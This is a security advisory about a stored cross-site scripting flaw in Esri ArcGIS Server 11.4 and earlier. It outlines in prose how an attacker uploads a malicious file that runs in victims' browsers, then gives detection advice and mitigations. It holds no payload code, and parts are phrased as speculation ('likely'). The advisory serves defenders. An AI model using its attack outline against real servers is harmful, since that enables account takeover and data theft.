Source: psirt@esri.com
There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server 11.4 and earlier is vulnerable to a stored cross-site scripting (XSS) attack, allowing unauthenticated attackers to inject malicious code. This vulnerability enables attackers to compromise user browsers, potentially leading to data theft, account takeover, and further system compromise. Successful exploitation requires specific server configurations and could impact organizations relying on ArcGIS Server for geospatial data management.
Step 1: Payload Creation: The attacker crafts a malicious file (e.g., an HTML file) containing JavaScript code designed to exploit the XSS vulnerability. This code could steal cookies, redirect users, or perform other malicious actions.
Step 2: File Upload: The attacker, exploiting a configuration vulnerability in ArcGIS Server, uploads the malicious file to the server. This upload process bypasses or circumvents the server's security checks.
Step 3: File Storage: The ArcGIS Server stores the uploaded malicious file, likely in a publicly accessible location or a location accessible to other users.
Step 4: Victim Interaction: A legitimate user of the ArcGIS Server accesses a page or resource that references the attacker's uploaded file. This could be through a map, a data view, or another ArcGIS Server feature.
Step 5: Payload Execution: The victim's browser executes the malicious JavaScript code embedded within the attacker's uploaded file. This code runs in the context of the victim's browser, allowing the attacker to perform actions on their behalf.
The vulnerability stems from insufficient input validation and sanitization of user-supplied data when storing files within the ArcGIS Server environment. Specifically, the server fails to properly sanitize user-uploaded files, allowing an attacker to inject malicious JavaScript code into files that are subsequently served to other users. When a victim accesses a page containing the malicious file, the injected JavaScript executes within the context of their browser, enabling the attacker to perform actions on behalf of the victim. The root cause is a lack of proper input validation and output encoding on user-supplied file content, leading to the storage of malicious payloads that are later executed in the victim's browser. The server's file storage mechanism, likely involving a database or file system, does not adequately filter or sanitize the uploaded content, allowing the XSS payload to persist.
While no specific APTs are definitively linked at this time, any threat actor targeting geospatial data or organizations using ArcGIS Server could exploit this vulnerability. This includes actors interested in espionage, data theft, or disruption. CISA KEV status is likely pending given the severity and potential impact.
Monitor web server logs for unusual file uploads, especially those with HTML or JavaScript file extensions.
Analyze network traffic for suspicious HTTP requests and responses, particularly those containing JavaScript code.
Implement a Web Application Firewall (WAF) to detect and block XSS attempts.
Monitor file system activity for newly created files in unexpected locations.
Examine server-side code for vulnerable input validation and output encoding practices.
Upgrade to ArcGIS Server version 11.5 or later, which includes patches for this vulnerability.
Implement robust input validation and output encoding to sanitize user-supplied data before storage and display.
Configure the ArcGIS Server to restrict file upload types and sizes.
Regularly scan the server for malicious files.
Implement a Web Application Firewall (WAF) to filter malicious requests.
Review and harden server configurations to minimize attack surface.
Apply the principle of least privilege to user accounts and server processes.